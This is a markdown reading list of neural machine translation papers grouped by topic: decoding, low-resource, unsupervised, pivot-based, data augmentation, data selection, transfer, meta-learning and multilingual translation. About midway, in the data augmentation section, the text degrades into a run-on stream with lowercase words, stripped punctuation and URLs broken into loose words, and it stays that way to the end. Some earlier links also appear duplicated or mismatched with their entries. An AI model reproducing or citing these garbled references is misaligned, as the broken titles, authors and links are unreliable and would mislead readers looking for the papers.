* Yin-Wen Chang and Michael Collins. 2017. [Source-Side Left-to-Right or Target-Side Left-to-Right? An Empirical Comparison of Two Phrase-Based Decoding Algorithms](http://aclweb.org/anthology/D17-1157). In *Proceedings of EMNLP 2017*.
* Jiatao Gu, Kyunghyun Cho, and Victor O.K. Li. 2017. [Trainable Greedy Decoding for Neural Machine Translation](http://aclweb.org/anthology/D17-1210). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=8731447567218149379&as_sdt=2005&sciodt=0,5&hl=en): 18)
* Huda Khayrallah, Gaurav Kumar, Kevin Duh, Matt Post, and Philipp Koehn. 2017. [Neural Lattice Search for Domain Adaptation in Machine Translation](http://www.aclweb.org/anthology/I17-2004). In *Proceedings of IJCNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cluster=1478484647323458623&hl=zh-CN&as_sdt=0,5): 4)
* Łukasz Kaiser, Aurko Roy, Ashish Vaswani, Niki Parmar, Samy Bengio, Jakob Uszkoreit, and Noam Shazeer. 2018. [Fast Decoding in Sequence Models Using Discrete Latent Variables](https://arxiv.org/pdf/1803.03382.pdf). In *Proceedings of ICML 2018*. ([Citation](https://scholar.google.com/scholar?cites=4042994175439965815&as_sdt=2005&sciodt=0,5&hl=en): 3)
* Xiangwen Zhang, Jinsong Su, Yue Qin, Yang Liu, Rongrong Ji, and Hongji Wang. 2018. [Asynchronous Bidirectional Decoding for Neural Machine Translation](https://arxiv.org/pdf/1801.05122). In *Proceedings of AAAI 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=8717464809531813198&as_sdt=2005&sciodt=0,5&hl=en): 10)
* Jiatao Gu, Daniel Jiwoong Im, and Victor O.K. Li. 2018. [Neural Machine Translation with Gumbel-Greedy Decoding](https://www.aaai.org/ocs/index.php/AAAI/AAAI18/paper/view/17299/16059). In *Proceedings of AAAI 2018*. ([Citation](https://scholar.google.com/scholar?cites=13306026917760415053&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Philip Schulz, Wilker Aziz, and Trevor Cohn. 2018. [A Stochastic Decoder for Neural Machine Translation](http://aclweb.org/anthology/P18-1115). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=2090499795836532737&as_sdt=2005&sciodt=0,5&hl=en): 3)
* Raphael Shu and Hideki Nakayama. 2018. [Improving Beam Search by Removing Monotonic Constraint for Neural Machine Translation](http://aclweb.org/anthology/P18-2054). In *Proceedings of ACL 2018*.
* Junyang Lin, Xu Sun, Xuancheng Ren, Shuming Ma, Jinsong Su, and Qi Su. 2018. [Deconvolution-Based Global Decoding for Neural Machine Translation](http://aclweb.org/anthology/C18-1276). In *Proceedings of COLING 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=7984371866238647123&as_sdt=2005&sciodt=0,5&hl=en): 2)
* Chunqi Wang, Ji Zhang, and Haiqing Chen. 2018. [Semi-Autoregressive Neural Machine Translation](http://aclweb.org/anthology/D18-1044). In *Proceedings of EMNLP 2018*.
* Xinwei Geng, Xiaocheng Feng, Bing Qin, and Ting Liu. 2018. [Adaptive Multi-pass Decoder for Neural Machine Translation](http://aclweb.org/anthology/D18-1048). In *Proceedings of EMNLP 2018*.
* Wen Zhang, Liang Huang, Yang Feng, Lei Shen, and Qun Liu. 2018. [Speeding Up Neural Machine Translation Decoding by Cube Pruning](http://aclweb.org/anthology/D18-1460). In *Proceedings of EMNLP 2018*.
* Xinyi Wang, Hieu Pham, Pengcheng Yin, and Graham Neubig. 2018. [A Tree-based Decoder for Neural Machine Translation](http://aclweb.org/anthology/D18-1509). In *Proceedings of EMNLP 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=9083843868999368969&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Chenze Shao, Xilin Chen, and Yang Feng. 2018. [Greedy Search with Probabilistic N-gram Matching for Neural Machine Translation](http://aclweb.org/anthology/D18-1510). In *Proceedings of EMNLP 2018*.
* Zhisong Zhang, Rui Wang, Masao Utiyama, Eiichiro Sumita, and Hai Zhao. 2018. [Exploring Recombination for Efficient Decoding of Neural Machine Translation](http://aclweb.org/anthology/D18-1511). In *Proceedings of EMNLP 2018*.
* Jetic Gū, Hassan S. Shavarani, and Anoop Sarkar. 2018. [Top-down Tree Structured Decoding with Syntactic Connections for Neural Machine Translation and Parsing](http://aclweb.org/anthology/D18-1037). In *Proceedings of EMNLP 2018*.
* Yilin Yang, Liang Huang, and Mingbo Ma. 2018. [Breaking the Beam Search Curse: A Study of (Re-)Scoring Methods and Stopping Criteria for Neural Machine Translation](http://aclweb.org/anthology/D18-1342). In *Proceedings of EMNLP 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=7003078853740771503&as_sdt=2005&sciodt=0,5&hl=en): 3)
* Yun Chen, Victor O.K. Li, Kyunghyun Cho, and Samuel R. Bowman. 2018. [A Stable and Effective Learning Strategy for Trainable Greedy Decoding](http://aclweb.org/anthology/D18-1035). In *Proceedings of EMNLP 2018*.
* Wouter Kool, Herke van Hoof, and Max Welling. 2019. [Stochastic Beams and Where to Find Them: The Gumbel-Top-k Trick for Sampling Sequences Without Replacement](http://proceedings.mlr.press/v97/kool19a/kool19a.pdf). In *Proceedings of ICML 2019*.
* Ashwin Kalyan, Peter Anderson, Stefan Lee, and Dhruv Batra. 2019. [Trainable Decoding of Sets of Sequences for Neural Sequence Models](http://proceedings.mlr.press/v97/kalyan19a/kalyan19a.pdf). In *Proceedings of ICML 2019*.
* Eldan Cohen and Christopher Beck. 2019. [Empirical Analysis of Beam Search Performance Degradation in Neural Sequence Models](http://proceedings.mlr.press/v97/cohen19a/cohen19a.pdf). In *Proceedings of ICML 2019*.
* Kartik Goyal, Chris Dyer, and Taylor Berg-Kirkpatrick. 2019. [An Empirical Investigation of Global and Local Normalization for Recurrent Neural Sequence Models Using a Continuous Relaxation to Beam Search](https://arxiv.org/pdf/1904.06834.pdf). In *Proceedings of NAACL 2019*.
* Mingbo Ma, Renjie Zheng, and Liang Huang. 2019. [Learning to Stop in Structured Prediction for Neural Machine Translation](https://arxiv.org/pdf/1904.01032.pdf). In *Proceedings of NAACL 2019*.
* Han Fu, Chenghao Liu, and Jianling Sun. 2019. [Reference Network for Neural Machine Translation](https://www.aclweb.org/anthology/P19-1287). In *Proceedings of ACL 2019*.
* Long Zhou, Jiajun Zhang, and Chengqing Zong. 2019. [Synchronous Bidirectional Neural Machine Translation](https://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00256). *Transactions of the Association for Computational Linguistics*.
* Zhiqing Sun, Zhuohan Li, Haoqing Wang, Zi Lin, Di He, and Zhi-Hong Deng. 2019. [Fast Structured Decoding for Sequence Models](https://arxiv.org/pdf/1910.11555). In *Proceedings of NeurIPS 2019*.
* Lifu Tu, Richard Yuanzhe Pang, Sam Wiseman, and Kevin Gimpel. 2020. [ENGINE: Energy-Based Inference Networks for Non-Autoregressive Machine Translation](http://arxiv.org/abs/2005.00850). In *Proceedings of ACL 2020*.
* Pinzhen Chen, Nikolay Bogoychev, Kenneth Heafield, and Faheem Kirefu. 2020. [Parallel Sentence Mining by Constrained Decoding](https://www.aclweb.org/anthology/2020.acl-main.152). In *Proceedings of ACL 2020*.
* Julia Kreutzer, George Foster, and Colin Cherry. 2020. [Inference Strategies for Machine Translation with Conditional Masking](https://www.aclweb.org/anthology/2020.emnlp-main.465). In *Proceedings of EMNLP 2020*.
* Yuntian Deng and Alexander Rush. 2020. [Cascaded Text Generation with Markov Transformers](https://papers.nips.cc/paper/2020/file/01a0683665f38d8e5e567b3b15ca98bf-Paper.pdf). In *Proceedings of NeurIPS 2020*.
* Clara Meister, Ryan Cotterell, and Tim Vieira. 2020. [If Beam Search Is the Answer, What Was the Question?](https://www.aclweb.org/anthology/2020.emnlp-main.170). In *Proceedings of EMNLP 2020*.
* Urvashi Khandelwal, Angela Fan, Dan Jurafsky, Luke Zettlemoyer, and Mike Lewis. 2021. [Nearest Neighbor Machine Translation](https://openreview.net/pdf?id=7wcbofj8hjm). In *Proceedings of ICLR 2021*.
* Mathias Müller and Rico Sennrich. 2021. [Understanding the Properties of Minimum Bayes Risk Decoding in Neural Machine Translation](https://aclanthology.org/2021.acl-long.22). In *Proceedings of ACL 2021*.
* Hongfei Xu, Qiuhui Liu, Josef van Genabith, Deyi Xiong, and Meng Zhang. 2021. [Multi-Head Highly Parallelized LSTM Decoder for Neural Machine Translation](https://aclanthology.org/2021.acl-long.23). In *Proceedings of ACL 2021*.
* Yang Feng, Shuhao Gu, Dengji Guo, Zhengxin Yang, and Chenze Shao. 2021. [Guiding Teacher Forcing with Seer Forcing for Neural Machine Translation](https://aclanthology.org/2021.acl-long.223.pdf). In *Proceedings of ACL 2021*.

<h3 id="low-resource-language-translation">Low-Resource Language Translation</h3>

* Rico Sennrich and Biao Zhang. 2019. [Revisiting Low-Resource Neural Machine Translation: A Case Study](https://arxiv.org/pdf/1905.11901). In *Proceedings of ACL 2019*.
* Danni Liu, Jan Niehues, James Cross, Francisco Guzmán, and Xian Li. 2021. [Improving Zero-Shot Translation by Disentangling Positional Information](https://aclanthology.org/2021.acl-long.101.pdf). In *Proceedings of ACL 2021*.

<h4 id="semi-supervised">Semi-Supervised Learning</h4>

* Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016. [Improving Neural Machine Translation Models with Monolingual Data](https://arxiv.org/pdf/1511.06709). In *Proceedings of ACL 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=16647011114557315277&as_sdt=2005&sciodt=0,5&hl=en): 220)
* Yong Cheng, Wei Xu, Zhongjun He, Wei He, Hua Wu, Maosong Sun, and Yang Liu. 2016. [Semi-Supervised Learning for Neural Machine Translation](http://aclweb.org/anthology/P16-1185). In *Proceedings of ACL 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=4238720597816763796&as_sdt=2005&sciodt=0,5&hl=en): 59)
* Tobias Domhan and Felix Hieber. 2017. [Using Target-side Monolingual Data for Neural Machine Translation through Multi-task Learning](http://aclweb.org/anthology/D17-1158). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=3638267208501348823&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Anna Currey, Antonio Valerio Miceli Barone, and Kenneth Heafield. 2017. [Copied Monolingual Data Improves Low-Resource Neural Machine Translation](http://aclweb.org/anthology/W17-4715). In *Proceedings of the Second Conference on Machine Translation*. ([Citation](https://scholar.google.com.hk/scholar?cites=5102771697654796737&as_sdt=2005&sciodt=0,5&hl=en): 14)
* Shuo Wang, Yang Liu, Chao Wang, Huanbo Luan, and Maosong Sun. 2019. [Improving Back-Translation with Uncertainty-based Confidence Estimation](https://arxiv.org/pdf/1909.00157). In *Proceedings of EMNLP 2019*.
* Zaixiang Zheng, Hao Zhou, Shujian Huang, Lei Li, Xin-Yu Dai, and Jiajun Chen. 2020. [Mirror-Generative Neural Machine Translation](https://openreview.net/forum?id=hkxqrtnyph). In *Proceedings of ICLR 2020*.

<h4 id="unsupervised">Unsupervised Learning</h4>

* Nima Pourdamghani and Kevin Knight. 2017. [Deciphering Related Languages](http://aclweb.org/anthology/D17-1266). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=1168382888604094286&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Mikel Artetxe, Gorka Labaka, Eneko Agirre, and Kyunghyun Cho. 2018. [Unsupervised Neural Machine Translation](https://openreview.net/pdf?id=sy2ogebaw). In *Proceedings of ICLR 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=6109181985493123662&as_sdt=2005&sciodt=0,5&hl=en): 78)
* Guillaume Lample, Alexis Conneau, Ludovic Denoyer, and Marc'Aurelio Ranzato. 2018. [Unsupervised Machine Translation Using Monolingual Corpora Only](https://openreview.net/pdf?id=rkyttf-az). In *Proceedings of ICLR 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=682955820897938264&as_sdt=2005&sciodt=0,5&hl=en): 78)
* Zhen Yang, Wei Chen, Feng Wang, and Bo Xu. 2018. [Unsupervised Neural Machine Translation with Weight Sharing](http://aclweb.org/anthology/P18-1005). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=16608767535553803928&as_sdt=2005&sciodt=0,5&hl=en): 6)
* Guillaume Lample, Myle Ott, Alexis Conneau, Ludovic Denoyer, and Marc'Aurelio Ranzato. 2018. [Phrase-Based & Neural Unsupervised Machine Translation](http://aclweb.org/anthology/D18-1549). In *Proceedings of EMNLP 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=17725098892021008539&as_sdt=2005&sciodt=0,5&hl=en): 24)
* Iftekhar Naim, Parker Riley, and Daniel Gildea. 2018. [Feature-Based Decipherment for Machine Translation](http://aclweb.org/anthology/J18-3006). *Computational Linguistics*. ([Citation](https://scholar.google.com.hk/scholar?cites=17725098892021008539&as_sdt=2005&sciodt=0,5&hl=en): 24)
* Jiawei Wu, Xin Wang, and William Yang Wang. 2019. [Extract and Edit: An Alternative to Back-Translation for Unsupervised Neural Machine Translation](https://arxiv.org/pdf/1904.02331.pdf). In *Proceedings of NAACL 2019*.
* Nima Pourdamghani, Nada Aldarrab, Marjan Ghazvininejad, Kevin Knight, and Jonathan May. 2019. [Translating Translationese: A Two-Step Approach to Unsupervised Machine Translation](https://arxiv.org/pdf/1906.05683). In *Proceedings of ACL 2019*.
* Jiaming Luo, Yuan Cao, and Regina Barzilay. 2019. [Neural Decipherment via Minimum-Cost Flow: From Ugaritic to Linear B](https://arxiv.org/pdf/1906.06718). In *Proceedings of ACL 2019*.
* Yichong Leng, Xu Tan, Tao Qin, Xiang-Yang Li, and Tie-Yan Liu. 2019. [Unsupervised Pivot Translation for Distant Languages](https://www.aclweb.org/anthology/P19-1017). In *Proceedings of ACL 2019*.
* Mikel Artetxe, Gorka Labaka, and Eneko Agirre. 2019. [An Effective Approach to Unsupervised Machine Translation](https://www.aclweb.org/anthology/P19-1019). In *Proceedings of ACL 2019*.
* Viktor Hangya and Alexander Fraser. 2019. [Unsupervised Parallel Sentence Extraction with Parallel Segment Detection Helps Machine Translation](https://www.aclweb.org/anthology/P19-1119). In *Proceedings of ACL 2019*.
* Haipeng Sun, Rui Wang, Kehai Chen, Masao Utiyama, Eiichiro Sumita, and Tiejun Zhao. 2019. [Unsupervised Bilingual Word Embedding Agreement for Unsupervised Neural Machine Translation](https://www.aclweb.org/anthology/P19-1119). In *Proceedings of ACL 2019*.
* Jiatao Gu, Yong Wang, Kyunghyun Cho, and Victor O.K. Li. 2019. [Improved Zero-shot Neural Machine Translation via Ignoring Spurious Correlations](https://www.aclweb.org/anthology/P19-1121). In *Proceedings of ACL 2019*.
* Sukanta Sen, Kamal Kumar Gupta, Asif Ekbal, and Pushpak Bhattacharyya. 2019. [Multilingual Unsupervised NMT using Shared Encoder and Language-Specific Decoders](https://www.aclweb.org/anthology/P19-1297). In *Proceedings of ACL 2019*.
* Shuo Ren, Yu Wu, Shujie Liu, Ming Zhou, and Shuai Ma. 2019. [Explicit Cross-lingual Pre-training for Unsupervised Machine Translation](https://www.aclweb.org/anthology/D19-1071.pdf). In *Proceedings of EMNLP 2019*.
* Haipeng Sun, Rui Wang, Kehai Chen, Masao Utiyama, Eiichiro Sumita, and Tiejun Zhao. 2020. [Knowledge Distillation for Multilingual Unsupervised Neural Machine Translation](https://arxiv.org/abs/2004.10171). In *Proceedings of ACL 2020*.
* Xiangyu Duan, Baijun Ji, Hao Jia, Min Tan, Min Zhang, Boxing Chen, Weihua Luo, and Yue Zhang. 2020. [Bilingual Dictionary Based Neural Machine Translation without Using Parallel Sentences](https://www.aclweb.org/anthology/2020.acl-main.143). In *Proceedings of ACL 2020*.
* Shuo Ren, Yu Wu, Shujie Liu, Ming Zhou, and Shuai Ma. 2020. [A Retrieve-and-Rewrite Initialization Method for Unsupervised Machine Translation](https://www.aclweb.org/anthology/2020.acl-main.320). In *Proceedings of ACL 2020*.
* Alexandra Chronopoulou, Dario Stojanovski, and Alexander Fraser. 2020. [Reusing a Pretrained Language Model on Languages with Limited Corpora for Unsupervised NMT](https://www.aclweb.org/anthology/2020.emnlp-main.214). In *Proceedings of EMNLP 2020*.
* Jerin Philip, Alexandre Berard, Matthias Gallé, and Laurent Besacier. 2020. [Monolingual Adapters for Zero-Shot Neural Machine Translation](https://www.aclweb.org/anthology/2020.emnlp-main.361). In *Proceedings of EMNLP 2020*.
* Dana Ruiter, Josef van Genabith, and Cristina España-Bonet. 2020. [Self-Induced Curriculum Learning in Self-Supervised Neural Machine Translation](https://www.aclweb.org/anthology/2020.emnlp-main.202). In *Proceedings of EMNLP 2020*.
* Wei-Jen Ko, Ahmed El-Kishky, Adithya Renduchintala, Vishrav Chaudhary, Naman Goyal, Francisco Guzmán, Pascale Fung, Philipp Koehn, and Mona Diab. 2021. [Adapting High-Resource NMT Models to Translate Low-Resource Related Languages without Parallel Data](https://aclanthology.org/2021.acl-long.66). In *Proceedings of ACL 2021*.

<h4 id="pivot-based">Pivot-based Methods</h4>

* Orhan Firat, Baskaran Sankaran, Yaser Al-Onaizan, Fatos T. Yarman Vural, and Kyunghyun Cho. 2016. [Zero-Resource Translation with Multi-Lingual Neural Machine Translation](http://aclweb.org/anthology/D16-1026). In *Proceedings of EMNLP 2016*. ([Citation](https://scholar.google.com/scholar?um=1&ie=UTF-8&lr&cites=9699063558012530354): 50)
* Hao Zheng, Yong Cheng, and Yang Liu. 2017. [Maximum Expected Likelihood Estimation for Zero-resource Neural Machine Translation](http://nlp.csai.tsinghua.edu.cn/~ly/papers/ijcai2017_zh.pdf). In *Proceedings of IJCAI 2017*. ([Citation](https://scholar.google.com/scholar?cites=8742684674953684271&as_sdt=2005&sciodt=0,5&hl=en): 9)
* Yong Cheng, Qian Yang, Yang Liu, Maosong Sun, and Wei Xu. 2017. [Joint Training for Pivot-based Neural Machine Translation](http://nlp.csai.tsinghua.edu.cn/~ly/papers/ijcai2017_cy.pdf). In *Proceedings of IJCAI 2017*. ([Citation](https://scholar.google.com/scholar?cites=11174626133676084798&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Yun Chen, Yang Liu, Yong Cheng, and Victor O.K. Li. 2017. [A Teacher-Student Framework for Zero-Resource Neural Machine Translation](http://aclweb.org/anthology/P17-1176). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com/scholar?cites=13349008860652038472&as_sdt=2005&sciodt=0,5&hl=en): 15)
* Yun Chen, Yang Liu, and Victor O.K. Li. 2018. [Zero-Resource Neural Machine Translation with Multi-Agent Communication Game](https://arxiv.org/pdf/1802.03116). In *Proceedings of AAAI 2018*. ([Citation](https://scholar.google.com/scholar?cites=13902575159717479954&as_sdt=2005&sciodt=0,5&hl=en): 6)
* Shuo Ren, Wenhu Chen, Shujie Liu, Mu Li, Ming Zhou, and Shuai Ma. 2018. [Triangular Architecture for Rare Language Translation](http://aclweb.org/anthology/P18-1006). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com/scholar?cites=10337098101101097173&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Yunsu Kim, Petre Petrov, Pavel Petrushkov, Shahram Khadivi, and Hermann Ney. 2019. [Pivot-based Transfer Learning for Neural Machine Translation between Non-English Languages](https://arxiv.org/pdf/1909.09524). In *Proceedings of EMNLP 2019*.

<h4 id="data-augmentation">Data Augmentation Methods</h4>

* Marzieh Fadaee, Arianna Bisazza, and Christof Monz. 2017. [Data Augmentation for Low-Resource Neural Machine Translation](http://aclweb.org/anthology/P17-2090). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com/scholar?cites=6141657859614474985&as_sdt=2005&sciodt=0,5&hl=en): 26)
* Marzieh Fadaee and Christof Monz. 2018. [Back-Translation Sampling by Targeting Difficult Words in Neural Machine Translation](http://aclweb.org/anthology/D18-1040). In *Proceedings of EMNLP 2018*.
* Sergey Edunov, Myle Ott, Michael Auli, and David Grangier. 2018. [Understanding Back-Translation at Scale](http://aclweb.org/anthology/D18-1045). In *Proceedings of EMNLP 2018*. ([Citation](https://scholar.google.com/scholar?cites=5388849145974890035&as_sdt=2005&sciodt=0,5&hl=en): 6)
* Xinyi Wang, Hieu Pham, Zihang Dai, and Graham Neubig. 2018. [SwitchOut: an Efficient Data Augmentation Algorithm for Neural Machine Translation](http://aclweb.org/anthology/D18-1100). In *Proceedings of EMNLP 2018*. ([Citation](https://scholar.google.com/scholar?cites=3839046500027819595&as_sdt=2005&sciodt=0,5&hl=en): 4)
* Mengzhou Xia, Xiang Kong, Antonios Anastasopoulos, and Graham Neubig. 2019. [Generalized Data Augmentation for Low-Resource Translation](https://arxiv.org/pdf/1906.03785). In *Proceedings of ACL 2019*.
* Jinhua Zhu, Fei Gao, Lijun Wu, Yingce Xia, Tao Qin, Wengang Zhou, Xueqi Cheng, and Tie-Yan Liu. 2019. [Soft Contextual Data Augmentation for Neural Machine Translation](https://arxiv.org/pdf/1905.10523). In *Proceedings of ACL 2019*.
* Chunting Zhou, Xuezhe Ma, Junjie Hu, and Graham Neubig. 2019. [Handling Syntactic Divergence in Low-resource Machine Translation](https://arxiv.org/pdf/1909.00040). In *Proceedings of EMNLP 2019*.
* Yuanpeng Li, Liang Zhao, Jianyu Wang, and Joel Hestness. 2019. [Compositional Generalization for Primitive Substitutions](https://arxiv.org/pdf/1910.02612). In *Proceedings of EMNLP 2019*.
* Guanlin Li, Lemao Liu, Guoping Huang, Conghui Zhu, and Tiejun Zhao. 2019. [Understanding Data Augmentation in Neural Machine Translation: Two Perspectives towards Generalization](https://www.aclweb.org/anthology/D19-1570). In *Proceedings of EMNLP 2019*.
* Sergey Edunov, Myle Ott, Marc'Aurelio Ranzato, and Michael Auli. 2020. [On The Evaluation of Machine Translation Systems Trained With Back-Translation](https://arxiv.org/abs/1908.05204). In *Proceedings of ACL 2020*.
* Aditya Siddhant, Ankur Bapna, Yuan Cao, Orhan Firat, Mia Chen, Sneha Kudugunta, Naveen Arivazhagan, and Yonghui Wu. 2020. [Leveraging Monolingual Data with Self-Supervision for Multilingual Neural Machine Translation](https://arxiv.org/abs/2005.04816). In *Proceedings of ACL 2020*.
* Jitao Xu, Josep Crego, and Jean Senellart. 2020. [Boosting Neural Machine Translation with Similar Translations](https://www.aclweb.org/anthology/2020.acl-main.144). In *Proceedings of ACL 2020*.
* Yong Cheng, Lu Jiang, Wolfgang Macherey, and Jacob Eisenstein. 2020. [AdvAug: Robust Adversarial Augmentation for Neural Machine Translation](https://www.aclweb.org/anthology/2020.acl-main.529). In *Proceedings of ACL 2020*.
* Benjamin Marie, Raphael Rubino, and Atsushi Fujita. 2020. [Tagged Back-translation Revisited: Why Does It Really Work?](https://www.aclweb.org/anthology/2020.acl-main.532). In *Proceedings of ACL 2020*.
* Huda Khayrallah, Brian Thompson, Matt Post, and Philipp Koehn. 2020. [Simulated Multiple Reference Training Improves Low-Resource Machine Translation](https://www.aclweb.org/anthology/2020.emnlp-main.7). In *Proceedings of EMNLP 2020*.
* Hao-Ran Wei, Zhirui Zhang, Boxing Chen, and Weihua Luo. 2020. [Iterative Domain-Repaired Back-Translation](https://www.aclweb.org/anthology/2020.emnlp-main.474). In *Proceedings of EMNLP 2020*.
* Xuan-Phi Nguyen, Shafiq Joty, Kui Wu, and Ai Ti Aw. 2020. Data Diversification: A Simple Strategy for Neural Machine Translation. https://papers.nips.cc/paper/2020/file/
7221e5c8ec6b08ef6d3f9ff3ce6eb1d1 paper pdf in proceedings of neurips 2020 christos baziotis barry haddow alexandra birch 2020 language model prior for low resource neural machine translation https www aclweb org anthology 2020 emnlp main 615 in proceedings of emnlp 2020 hieu pham xinyi wang yiming yang graham neubig 2021 meta back translation https openreview net pdf id 3jjmdp7hha in proceedings of iclr 2021 m saiful bari tasnim mohiuddin and shafiq joty 2021 uxla a robust unsupervised data augmentation framework for zero resource cross lingual nlp https aclanthology org 2021 acl long 154 pdf in proceedings of acl 2021 h4 id data selection data selection methods h4 marlies van der wees arianna bisazza and christof monz 2017 dynamic data selection for neural machine translation http aclweb org anthology d17 1147 in proceedings of emnlp 2017 citation https scholar google com com scholar cites 2308754825624963103 as sdt 2005 sciodt 0 5 hl en 16 wei wang taro watanabe macduff hughes tetsuji nakagawa and ciprian chelba 2018 denoising neural machine translation training with trusted data and online data selection http aclweb org anthology w18 6314 in proceedings of the third conference on machine translation minh quang pham josep crego jean senellart and fran ois yvon 2018 fixing translation divergences in parallel corpora for neural mt http aclweb org anthology d18 1328 in proceedings of emnlp 2018 xinyi wang and graham neubig 2019 target conditioned sampling optimizing data selection for multilingual neural machine translation https arxiv org pdf 1905 08212 in proceedings of acl 2019 wei wang isaac caswell and ciprian chelba 2019 dynamically composing domain data selection with clean data selection by co curricular learning for neural machine translation https www aclweb org anthology p19 1123 in proceedings of acl 2019 dana ruiter cristina espa a bonet and josef van genabith 2019 self supervised neural machine translation https www aclweb org anthology p19 1178 in 
proceedings of acl 2019 xabier soto dimitar shterionov alberto poncelas and andy way 2020 selecting backtranslated data from multiple sources for improved neural machine translation http arxiv org abs 2005 00308 in proceedings of acl 2020 jiawei zhou and phillip keung 2020 improving non autoregressive neural machine translation with monolingual data https arxiv org abs 2005 00932 in proceedings of acl 2020 boliang zhang ajay nagesh and kevin knight 2020 parallel corpus filtering via pre trained language models https www aclweb org anthology 2020 acl main 756 in proceedings of acl 2020 zi yi dou antonios anastasopoulos graham neubig 2020 dynamic data selection and weighting for iterative back translation https www aclweb org anthology 2020 emnlp main 475 in proceedings of emnlp 2020 wenxiang jiao xing wang zhaopeng tu shuming shi michael r lyu irwin king 2021 self training sampling with monolingual data uncertainty for neural machine translation https aclanthology org 2021 acl long 221 pdf h4 id transfer learning transfer learning h4 barret zoph deniz yuret jonathan may and kevin knight 2016 transfer learning for low resource neural machine translation https www isi edu natural language mt emnlp16 transfer pdf in proceedings of emnlp 2016 citation https scholar google com scholar cites 10126416754494258051 as sdt 2005 sciodt 0 5 hl en 104 jiatao gu hany hassan jacob devlin and victor o k li 2018 universal neural machine translation for extremely low resource languages http aclweb org anthology n18 1032 in proceedings of naacl 2018 citation https scholar google com scholar cites 17858246967554922903 as sdt 2005 sciodt 0 5 hl en 17 tom kocmi and ond ej bojar 2018 trivial transfer learning for low resource neural machine translation http aclweb org anthology w18 6325 in proceedings of the third conference on machine translation research papers boyuan pan yazheng yang hao li zhou zhao yueting zhuang deng cai and xiaofei he 2018 macnet transferring knowledge from machine 
comprehension to sequence to sequence models https papers nips cc paper 7848 macnet transferring knowledge from machine comprehension to sequence to sequence models pdf in proceedings of neurips 2018 yunsu kim yingbo gao and hermann ney 2019 effective cross lingual transfer of neural machine translation models without shared vocabularies https www aclweb org anthology p19 1120 in proceedings of acl 2019 baijun ji zhirui zhang xiangyu duan min zhang boxing chen and weihua luo 2020 cross lingual pre training based transfer for zero shot neural machine translation https arxiv org abs 1912 01214 in proceedings of aaai 2020 alham fikri aji nikolay bogoychev kenneth heafield and rico sennrich 2020 in neural machine translation what does transfer learning transfer https www aclweb org anthology 2020 acl main 688 in proceedings of acl 2020 mikel artetxe gorka labaka eneko agirre 2020 translation artifacts in cross lingual transfer learning https www aclweb org anthology 2020 emnlp main 618 in proceedings of emnlp 2020 h4 id meta learning meta learning h4 jiatao gu yong wang yun chen kyunghyun cho and victor o k li 2018 meta learning for low resource neural machine translation http aclweb org anthology d18 1398 in proceedings of emnlp 2018 citation https scholar google com hk scholar cites 15276484097983678999 as sdt 2005 sciodt 0 5 hl en 3 rumeng li xun wang and hong yu 2020 metamt a metalearning method leveraging multiple domain data for low resource machine translation https arxiv org abs 1912 05467 in proceedings of aaai 2020 h3 id multilingual multilingual machine translation h3 daxiang dong hua wu wei he dianhai yu and haifeng wang 2015 multi task learning for multiple language translation http aclweb org anthology p15 1166 in proceedings of acl 2015 citation https scholar google com scholar um 1 ie utf 8 lr cites 6980356795259585193 126 orhan firat kyunghyun cho and yoshua bengio 2016 multi way multilingual neural machine translation with a shared attention mechanism 
https arxiv org pdf 1601 01073 pdf in proceedings of naacl 2016 citation https scholar google com scholar cites 1297298716616390295 as sdt 2005 sciodt 0 5 hl en 146 barret zoph and kevin knight 2016 multi source neural translation https arxiv org pdf 1601 00710 pdf in proceedings of naacl 2016 citation https scholar google com scholar cites 9798500345837394101 as sdt 2005 sciodt 0 5 hl en 87 orhan firat baskaran sankaran yaser al onaizan fatos t yarman vural kyunghyun cho 2016 zero resource translation with multi lingual neural machine translation https arxiv org pdf 1606 04164 pdf in proceedings of emnlp 2016 citation https scholar google com scholar cites 9699063558012530354 as sdt 2005 sciodt 0 5 hl en 50 melvin johnson mike schuster quoc v le maxim krikun yonghui wu zhifeng chen nikhil thorat fernanda vi gas martin wattenberg greg corrado macduff hughes and jeffrey dean 2017 google s multilingual neural machine translation system enabling zero shot translation https arxiv org pdf 1611 04558 transactions of the association for computational linguistics citation https scholar google com scholar cites 12207392403413415154 as sdt 2005 sciodt 0 5 hl en 297 poorya zaremoodi and gholamreza haffari 2018 neural machine translation for bilingually scarce scenarios a deep multi task learning approach http aclweb org anthology n18 1123 in proceedings of naacl 2018 citation https scholar google com scholar cites 2302112873809678173 as sdt 2005 sciodt 0 5 hl en 1 poorya zaremoodi wray buntine and gholamreza haffari 2018 adaptive knowledge sharing in multi task learning improving low resource neural machine translation http aclweb org anthology p18 2104 in proceedings of acl 2018 surafel melaku lakew mauro cettolo and marcello federico 2018 a comparison of transformer and recurrent neural networks on multilingual neural machine translation http aclweb org anthology c18 1054 in proceedings of coling 2018 citation https scholar google com scholar cites 3404592318370335271 as 
